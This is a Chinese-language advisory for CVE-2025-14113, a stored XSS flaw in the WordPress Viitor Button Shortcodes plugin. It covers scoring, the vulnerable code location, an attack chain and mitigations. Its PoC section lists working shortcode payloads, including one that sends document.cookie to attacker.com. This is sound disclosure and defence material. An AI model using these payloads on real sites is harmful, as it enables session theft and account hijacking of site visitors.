CVE-2025-14113 WordPress Viitor Button Shortcodes插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14113

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Viitor Button Shortcodes插件

漏洞概述

CVE-2025-14113是WordPress Viitor Button Shortcodes插件中的一个存储型跨站脚本（Stored XSS）安全漏洞。该插件是一款用于WordPress的按钮短代码生成工具，版本最高至3.0.0存在此漏洞。漏洞的根本原因在于插件对用户输入的'link'短代码属性缺乏充分的输入清理和输出转义处理。攻击者通过利用此漏洞，可以在WordPress页面或文章中注入恶意JavaScript代码。由于是存储型XSS，恶意代码会被永久保存在服务器端，任何访问包含恶意内容的页面的用户都会触发该脚本执行。攻击者可借此窃取会话Cookie、劫持用户账户、进行钓鱼攻击或传播恶意软件。漏洞利用需要攻击者拥有WordPress Contributor级别或更高级别的账户权限。

技术细节

该漏洞存在于插件的class-ww-vcsc-shortcodes.php文件第51行附近，具体为处理'link'短代码属性的逻辑中。当用户在短代码中通过link属性提供URL时，插件直接将用户输入嵌入到HTML输出中而未进行适当的HTML实体转义或URL验证。攻击者可以在link属性中注入JavaScript伪协议（javascript:）或包含事件处理器的HTML标签。例如，攻击者可构造形如[button link='javascript:alert(document.cookie)']的短代码，当其他用户访问该页面时，浏览器会执行注入的JavaScript代码。由于WordPress的Contributor角色具有创建和编辑文章的权限，攻击面相对较大。漏洞的CVSS 3.1评分为6.4（中等严重程度），攻击复杂度低，无需用户交互即可成功利用。

攻击链分析

STEP 1

步骤1：侦察与目标识别

攻击者识别目标网站使用的WordPress版本，并确认安装了Viitor Button Shortcodes插件且版本≤3.0.0

STEP 2

步骤2：获取访问权限

攻击者通过社会工程、凭证填充或其他方式获取WordPress Contributor级别或更高权限的账户

STEP 3

步骤3：构造恶意Payload

攻击者构造包含XSS payload的短代码，利用link属性注入JavaScript伪协议或HTML事件处理器

STEP 4

步骤4：注入恶意内容

攻击者在WordPress页面或文章中插入恶意短代码并发布，payload被永久存储在数据库中

STEP 5

步骤5：触发执行

受害者访问包含恶意内容的页面，浏览器解析HTML时执行注入的JavaScript代码

STEP 6

步骤6：窃取敏感信息

恶意脚本执行后，可窃取用户会话Cookie、劫持账户、执行未授权操作或传播恶意内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// WordPress Stored XSS PoC - CVE-2025-14113
// Author: Contributor+ level authenticated attacker

// Method 1: Using JavaScript protocol in link attribute
[button link='javascript:alert(document.domain)']Click Me[/button]

// Method 2: Using event handler in link attribute
[button link='" onerror="alert(document.cookie)" x="']Button Text[/button]

// Method 3: More sophisticated payload
[button link='javascript:fetch("https://attacker.com/steal?c="+document.cookie)']Submit[/button]

// Exploitation scenario:
// 1. Attacker with Contributor role creates/edits a post
// 2. Inserts malicious shortcode with XSS payload in link attribute
// 3. Publishes or submits the post for review
// 4. Any user viewing the page executes the injected JavaScript
// 5. Attacker steals session cookies or performs actions on behalf of victim

影响范围

Viitor Button Shortcodes ≤ 3.0.0

防御指南

临时缓解措施

如果无法立即更新插件，可采取以下临时缓解措施：1）暂时禁用Viitor Button Shortcodes插件或使用其他替代插件；2）限制用户的 Contributor 角色权限，禁止其创建或编辑包含短代码的文章；3）部署Web应用防火墙（WAF）规则过滤包含javascript:伪协议和常见XSS payload的请求；4）实施严格的CSP策略阻止内联脚本执行；5）监控WordPress数据库中的可疑短代码内容。